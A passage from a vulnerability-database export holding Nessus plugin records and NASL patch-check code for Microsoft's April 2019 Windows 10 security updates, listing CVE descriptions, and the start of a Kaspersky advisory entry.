webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-0802, CVE-2019-0849)\n\n - A remote code execution vulnerability exists when OLE\n automation improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could gain execution on the victim system.\n (CVE-2019-0794)\n\n - A remote code execution vulnerability exists when the\n IOleCvt interface renders ASP webpage content. An\n attacker who successfully exploited the vulnerability\n could run malicious code remotely to take control of the\n users system. (CVE-2019-0845)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-0853)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-0842)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-0739)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-0846, CVE-2019-0847, CVE-2019-0851,\n CVE-2019-0877, CVE-2019-0879)\n\n - An elevation of privilege vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0735)\n\n - An information disclosure vulnerability exists when\n Windows Task Scheduler improperly discloses credentials\n to Windows Credential Manager. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-0838)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0685, CVE-2019-0803,\n CVE-2019-0859)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2019-0856)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0814, CVE-2019-0848)\n\n - An elevation of privilege vulnerability exists when\n Windows AppX Deployment Service (AppXSVC) improperly\n handles hard links. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-0841)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-0790,\n CVE-2019-0791, CVE-2019-0792, CVE-2019-0793,\n CVE-2019-0795)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2019-0806, CVE-2019-0810,\n CVE-2019-0812, CVE-2019-0829, CVE-2019-0860,\n CVE-2019-0861)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could set the short name of a file with a\n long name to an arbitrary short name, overriding the\n file system with limited privileges. (CVE-2019-0796)\");\n # https://support.microsoft.com/en-us/help/4493474/windows-10-update-kb4493474\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8d95979f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4493474.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0853\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AppXSvc Hard Link Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-04\";\nkbs = make_list('4493474');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"04_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4493474])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:13:26", "description": "The remote Windows host is missing security update 4493509.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Windows which could allow an attacker to bypass Device\n Guard when Windows improperly handles calls to the LUAFV\n driver (luafv.sys). An attacker who successfully\n exploited this vulnerability could circumvent a User\n Mode Code Integrity (UMCI) policy on the machine.\n (CVE-2019-0732)\n\n - An information disclosure vulnerability exists when the\n Terminal Services component improperly discloses the\n contents of its memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise a users system. (CVE-2019-0839)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0688)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0840, CVE-2019-0844)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could run arbitrary code in the security\n context of the local system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-0730, CVE-2019-0731, CVE-2019-0805,\n CVE-2019-0836)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-0802, CVE-2019-0849)\n\n - A remote code execution vulnerability exists when OLE\n automation improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could gain execution on the victim system.\n (CVE-2019-0794)\n\n - A remote code execution vulnerability exists when the\n IOleCvt interface renders ASP webpage content. An\n attacker who successfully exploited the vulnerability\n could run malicious code remotely to take control of the\n users system. (CVE-2019-0845)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-0853)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-0842)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-0739)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-0846, CVE-2019-0847, CVE-2019-0851,\n CVE-2019-0877, CVE-2019-0879)\n\n - An elevation of privilege vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0735)\n\n - An information disclosure vulnerability exists when\n Windows Task Scheduler improperly discloses credentials\n to Windows Credential Manager. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-0838)\n\n - An elevation of privilege vulnerability exists when\n Windows AppX Deployment Service (AppXSVC) improperly\n handles hard links. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-0841)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0833)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2019-0856)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0814, CVE-2019-0848)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0685, CVE-2019-0803,\n CVE-2019-0859)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Server Message Block (SMB) Server when an\n attacker with valid credentials attempts to open a\n specially crafted file over the SMB protocol on the same\n machine. An attacker who successfully exploited this\n vulnerability could bypass certain security checks in\n the operating system. (CVE-2019-0786)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-0790,\n CVE-2019-0791, CVE-2019-0792, CVE-2019-0793,\n CVE-2019-0795)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2019-0806, CVE-2019-0810,\n CVE-2019-0812, CVE-2019-0829, CVE-2019-0860,\n CVE-2019-0861)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could set the short name of a file with a\n long name to an arbitrary short name, overriding the\n file system with limited privileges. (CVE-2019-0796)", "edition": 14, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-09T00:00:00", "title": "KB4493509: Windows 10 Version 1809 and Windows Server 2019 April 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2019-0848", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0814", "CVE-2019-0812", "CVE-2019-0810", "CVE-2019-0846", "CVE-2019-0786", "CVE-2019-0861", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0688", "CVE-2019-0847", "CVE-2019-0860", "CVE-2019-0806", "CVE-2019-0793", "CVE-2019-0790", "CVE-2019-0764", "CVE-2019-0841", "CVE-2019-0859", "CVE-2019-0840", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0739", "CVE-2019-0856", "CVE-2019-0685", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0829", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0849", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0833", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "modified": "2019-04-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS19_APR_4493509.NASL", "href": "https://www.tenable.com/plugins/nessus/123948", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123948);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2019-0685\",\n \"CVE-2019-0688\",\n \"CVE-2019-0730\",\n \"CVE-2019-0731\",\n \"CVE-2019-0732\",\n \"CVE-2019-0735\",\n \"CVE-2019-0739\",\n \"CVE-2019-0752\",\n \"CVE-2019-0753\",\n \"CVE-2019-0764\",\n \"CVE-2019-0786\",\n \"CVE-2019-0790\",\n \"CVE-2019-0791\",\n \"CVE-2019-0792\",\n \"CVE-2019-0793\",\n \"CVE-2019-0794\",\n \"CVE-2019-0795\",\n \"CVE-2019-0796\",\n \"CVE-2019-0802\",\n \"CVE-2019-0803\",\n \"CVE-2019-0805\",\n \"CVE-2019-0806\",\n \"CVE-2019-0810\",\n \"CVE-2019-0812\",\n \"CVE-2019-0814\",\n \"CVE-2019-0829\",\n \"CVE-2019-0833\",\n \"CVE-2019-0835\",\n \"CVE-2019-0836\",\n \"CVE-2019-0838\",\n \"CVE-2019-0839\",\n \"CVE-2019-0840\",\n \"CVE-2019-0841\",\n \"CVE-2019-0842\",\n \"CVE-2019-0844\",\n \"CVE-2019-0845\",\n \"CVE-2019-0846\",\n \"CVE-2019-0847\",\n \"CVE-2019-0848\",\n \"CVE-2019-0849\",\n \"CVE-2019-0851\",\n \"CVE-2019-0853\",\n \"CVE-2019-0856\",\n \"CVE-2019-0859\",\n \"CVE-2019-0860\",\n \"CVE-2019-0861\",\n \"CVE-2019-0862\",\n \"CVE-2019-0877\",\n \"CVE-2019-0879\"\n );\n script_xref(name:\"MSKB\", value:\"4493509\");\n script_xref(name:\"MSFT\", value:\"MS19-4493509\");\n\n script_name(english:\"KB4493509: Windows 10 Version 1809 and Windows Server 2019 April 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4493509.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Windows which could allow an attacker to bypass Device\n Guard when Windows improperly handles calls to the LUAFV\n driver (luafv.sys). An attacker who successfully\n exploited this vulnerability could circumvent a User\n Mode Code Integrity (UMCI) policy on the machine.\n (CVE-2019-0732)\n\n - An information disclosure vulnerability exists when the\n Terminal Services component improperly discloses the\n contents of its memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise a users system. (CVE-2019-0839)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0688)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0840, CVE-2019-0844)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could run arbitrary code in the security\n context of the local system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-0730, CVE-2019-0731, CVE-2019-0805,\n CVE-2019-0836)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-0802, CVE-2019-0849)\n\n - A remote code execution vulnerability exists when OLE\n automation improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could gain execution on the victim system.\n (CVE-2019-0794)\n\n - A remote code execution vulnerability exists when the\n IOleCvt interface renders ASP webpage content. An\n attacker who successfully exploited the vulnerability\n could run malicious code remotely to take control of the\n users system. (CVE-2019-0845)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-0853)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-0842)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-0739)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-0846, CVE-2019-0847, CVE-2019-0851,\n CVE-2019-0877, CVE-2019-0879)\n\n - An elevation of privilege vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0735)\n\n - An information disclosure vulnerability exists when\n Windows Task Scheduler improperly discloses credentials\n to Windows Credential Manager. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-0838)\n\n - An elevation of privilege vulnerability exists when\n Windows AppX Deployment Service (AppXSVC) improperly\n handles hard links. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-0841)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0833)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2019-0856)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0814, CVE-2019-0848)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0685, CVE-2019-0803,\n CVE-2019-0859)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Server Message Block (SMB) Server when an\n attacker with valid credentials attempts to open a\n specially crafted file over the SMB protocol on the same\n machine. An attacker who successfully exploited this\n vulnerability could bypass certain security checks in\n the operating system. (CVE-2019-0786)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-0790,\n CVE-2019-0791, CVE-2019-0792, CVE-2019-0793,\n CVE-2019-0795)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2019-0806, CVE-2019-0810,\n CVE-2019-0812, CVE-2019-0829, CVE-2019-0860,\n CVE-2019-0861)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could set the short name of a file with a\n long name to an arbitrary short name, overriding the\n file system with limited privileges. (CVE-2019-0796)\");\n # https://support.microsoft.com/en-us/help/4493509/windows-10-update-kb4493509\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b1b34dad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4493509.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0853\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AppXSvc Hard Link Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-04\";\nkbs = make_list('4493509');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"04_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4493509])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:42:51", "bulletinFamily": "info", "cvelist": ["CVE-2019-0862", "CVE-2019-0812", "CVE-2019-0810", "CVE-2019-0861", "CVE-2019-0752", "CVE-2019-0860", "CVE-2019-0806", "CVE-2019-0764", "CVE-2019-0753", "CVE-2019-0739", "CVE-2019-0829", "CVE-2019-0833", "CVE-2019-0835"], "description": "### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4493441](<http://support.microsoft.com/kb/4493441>) \n[4493474](<http://support.microsoft.com/kb/4493474>) \n[4493464](<http://support.microsoft.com/kb/4493464>) \n[4493509](<http://support.microsoft.com/kb/4493509>) \n[4493470](<http://support.microsoft.com/kb/4493470>) \n[4493475](<http://support.microsoft.com/kb/4493475>) \n[4493472](<http://support.microsoft.com/kb/4493472>) \n[4493451](<http://support.microsoft.com/kb/4493451>) \n[4493446](<http://support.microsoft.com/kb/4493446>) \n[4493435](<http://support.microsoft.com/kb/4493435>) \n[4530684](<http://support.microsoft.com/kb/4530684>)\n\n### *Detect date*:\n04/09/2019\n\n### 